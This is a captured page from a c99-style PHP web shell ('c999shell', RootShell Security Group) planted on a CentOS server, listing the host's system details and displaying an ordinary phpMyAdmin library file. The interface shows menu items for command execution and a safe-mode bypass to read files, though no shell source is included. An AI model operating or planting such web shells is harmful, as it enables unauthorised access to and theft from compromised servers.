Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php /* $Id: display_create_table.lib.php,v 1.9 2006/01/19 17:12:12 lem9 Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: // Displays form for creating a table (if user has privileges for that) require_once('./libraries/check_user_privileges.lib.php'); // for MySQL >= 4.1.0, we should be able to detect if user has a CREATE // privilege by looking at SHOW GRANTS output; // for < 4.1.0, it could be more difficult because the logic tries to // detect the current host and it might be expressed in many ways; also // on a shared server, the user might be unable to define a controluser // that has the proper rights to the "mysql" db; // so we give up and assume that user has the right to create a table // // Note: in this case we could even skip the following "foreach" logic // Addendum, 2006-01-19: ok, I give up. We got some reports about servers // where the hostname field in mysql.user is not the same as the one // in mysql.db for a user. In this case, SHOW GRANTS does not return // the db-specific privileges. And probably, those users are on a shared // server, so can't set up a control user with rights to the "mysql" db. // We cannot reliably detect the db-specific privileges, so no more // warnings about the lack of privileges for CREATE TABLE. Tested // on MySQL 5.0.18. $is_create_table_priv = true; /* if (PMA_MYSQL_INT_VERSION >= 40100) { $is_create_table_priv = false; } else { $is_create_table_priv = true; } foreach ( $dbs_where_create_table_allowed as $allowed_db ) { // if we find the exact db name, we stop here if ($allowed_db == $db) { $is_create_table_priv = TRUE; break; } // '*' indicates a global CREATE priv if ($allowed_db == '*') { $is_create_table_priv = TRUE; break; } if (ereg('%|_', $allowed_db)) { // take care of wildcards and escaped wildcards, // transforming them into regexp patterns $max_position = strlen($allowed_db) - 1; $i = 0; $pattern = ''; while ($i <= $max_position) { if ($allowed_db[$i] == '\\'){ if ($i < $max_position - 1 && $allowed_db[$i+1] == '_'){ $chunk = '_'; $i++; } elseif ($i < $max_position - 1 && $allowed_db[$i+1] == '%'){ $chunk = '%'; $i++; } else { $chunk = $allowed_db[$i]; } } elseif ($allowed_db[$i] == '_'){ $chunk = '.'; } elseif ($allowed_db[$i] == '%'){ $chunk = '(.)*'; } else { $chunk = $allowed_db[$i]; } $pattern .= $chunk; $i++; } // end while unset($i, $max_position, $chunk); $matches = ''; if (preg_match('@' .$pattern . '@i', $db, $matches)) { if ($matches[0] == $db) { $is_create_table_priv = TRUE; break; //TODO: maybe receive in $allowed_db also the db names // on which we cannot CREATE, and check them // in this foreach, because if a user is allowed to CREATE // on db foo% but forbidden on db foobar, he should not // see the Create table dialog } } } } // end foreach unset($i, $max_position, $chunk, $pattern); */ ?> <form method="post" action="tbl_create.php" onsubmit="return (emptyFormElements(this, 'table') && checkFormElementInRange(this, 'num_fields', '<?php echo str_replace('\'', '\\\'', $GLOBALS['strInvalidFieldCount']); ?>', 1))"> <fieldset> <legend> <?php if ( $GLOBALS['cfg']['PropertiesIconic'] ) { echo '<img class="icon" src="' . $pmaThemeImage . 'b_newtbl.png" width="16" height="16" alt="" />'; } echo sprintf( $strCreateNewTable, PMA_getDbLink() ); ?> </legend> <?php if ( $is_create_table_priv ) { ?> <?php echo PMA_generate_common_hidden_inputs( $db ); ?> <div class="formelement"> <?php echo $strName; ?>: <input type="text" name="table" maxlength="64" size="30" /> </div> <div class="formelement"> <?php echo $strNumberOfFields; ?>: <input type="text" name="num_fields" size="2" /> </div> <div class="clearfloat"></div> </fieldset> <fieldset class="tblFooters"> <input type="submit" value="<?php echo $strGo; ?>" /> <?php } else { ?> <div class="error"><?php echo $strNoPrivileges; ?></div> <?php } // end if else ?> </fieldset> </form> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]-- |